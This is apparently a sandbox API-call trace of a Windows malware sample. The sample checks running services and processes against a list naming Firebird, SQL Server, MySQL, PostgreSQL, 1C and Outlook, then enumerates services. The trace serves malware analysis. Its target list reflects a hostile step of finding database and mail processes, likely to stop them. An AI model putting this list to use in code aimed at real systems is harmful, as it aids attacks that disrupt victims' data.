	[0145.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0145.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0145.463] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0145.463] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0145.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0145.463] lstrlenW (lpString="MpsSvc") returned 6
	[0145.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0145.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0145.463] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0145.463] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0145.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0145.463] lstrlenW (lpString="NlaSvc") returned 6
	[0145.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0145.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0145.463] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0145.463] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0145.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0145.463] lstrlenW (lpString="nsi") returned 3
	[0145.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0145.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0145.464] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0145.464] lstrlenW (lpString="PcaSvc") returned 6
	[0145.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0145.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0145.464] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0145.464] lstrlenW (lpString="PlugPlay") returned 8
	[0145.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0145.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0145.464] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0145.464] lstrlenW (lpString="Power") returned 5
	[0145.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0145.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0145.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0145.464] lstrlenW (lpString="ProfSvc") returned 7
	[0145.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0145.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0145.464] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0145.464] lstrlenW (lpString="RpcEptMapper") returned 12
	[0145.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0145.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0145.464] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0145.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0145.464] lstrlenW (lpString="RpcSs") returned 5
	[0145.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0145.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0145.465] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0145.465] lstrlenW (lpString="SamSs") returned 5
	[0145.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0145.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0145.465] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0145.465] lstrlenW (lpString="Schedule") returned 8
	[0145.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0145.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0145.465] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0145.465] lstrlenW (lpString="SENS") returned 4
	[0145.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0145.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0145.465] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0145.465] lstrlenW (lpString="ShellHWDetection") returned 16
	[0145.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0145.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0145.465] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0145.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0145.465] lstrlenW (lpString="Spooler") returned 7
	[0145.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0145.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0145.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0145.466] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0145.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0145.466] lstrlenW (lpString="Themes") returned 6
	[0145.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0145.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0145.466] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0145.466] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0145.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0145.466] lstrlenW (lpString="UxSms") returned 5
	[0145.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0145.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0145.466] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0145.466] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0145.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0145.466] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0145.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c4
	[0145.468] Process32FirstW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0145.468] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0145.468] lstrlenW (lpString="System") returned 6
	[0145.468] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0145.468] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0145.468] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0145.468] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0145.469] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0145.469] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0145.469] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0145.469] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0145.469] lstrlenW (lpString="smss.exe") returned 8
	[0145.469] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0145.469] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0145.469] lstrlenW (lpString="csrss.exe") returned 9
	[0145.469] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0145.469] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0145.470] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0145.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0145.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0145.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0145.470] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0145.470] lstrlenW (lpString="wininit.exe") returned 11
	[0145.470] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0145.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0145.470] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0145.470] lstrlenW (lpString="csrss.exe") returned 9
	[0145.471] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0145.471] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0145.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0145.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0145.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0145.471] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0145.471] lstrlenW (lpString="winlogon.exe") returned 12
	[0145.471] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0145.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0145.471] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0145.472] lstrlenW (lpString="services.exe") returned 12
	[0145.472] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0145.472] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0145.472] lstrlenW (lpString="lsass.exe") returned 9
	[0145.472] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0145.472] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0145.472] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0145.472] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0145.472] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0145.472] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0145.472] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0145.473] lstrlenW (lpString="lsm.exe") returned 7
	[0145.473] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0145.473] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0145.473] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0145.473] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0145.473] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0145.473] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.473] lstrlenW (lpString="svchost.exe") returned 11
	[0145.473] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0145.473] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0145.473] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.474] lstrlenW (lpString="svchost.exe") returned 11
	[0145.474] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0145.474] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.474] lstrlenW (lpString="svchost.exe") returned 11
	[0145.474] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0145.474] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0145.474] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.475] lstrlenW (lpString="svchost.exe") returned 11
	[0145.475] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0145.475] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.475] lstrlenW (lpString="svchost.exe") returned 11
	[0145.475] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0145.475] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0145.475] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0145.476] lstrlenW (lpString="audiodg.exe") returned 11
	[0145.476] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.476] lstrlenW (lpString="svchost.exe") returned 11
	[0145.476] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.476] lstrlenW (lpString="svchost.exe") returned 11
	[0145.476] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0145.477] lstrlenW (lpString="spoolsv.exe") returned 11
	[0145.477] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0145.477] lstrlenW (lpString="svchost.exe") returned 11
	[0145.477] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0145.477] lstrlenW (lpString="taskhost.exe") returned 12
	[0145.477] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0145.478] lstrlenW (lpString="userinit.exe") returned 12
	[0145.478] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0145.478] lstrlenW (lpString="dwm.exe") returned 7
	[0145.478] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0145.478] lstrlenW (lpString="explorer.exe") returned 12
	[0145.478] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0145.479] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0145.479] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0145.479] lstrlenW (lpString="reader_sl.exe") returned 13
	[0145.479] Process32NextW (in: hSnapshot=0x3c4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0145.479] CloseHandle (hObject=0x3c4) returned 1
	[0145.479] Sleep (dwMilliseconds=0x1f4) 
	[0146.087] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617020
	[0146.095] EnumServicesStatusExW (in: hSCManager=0xb617020, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0146.096] GetLastError () returned 0xea
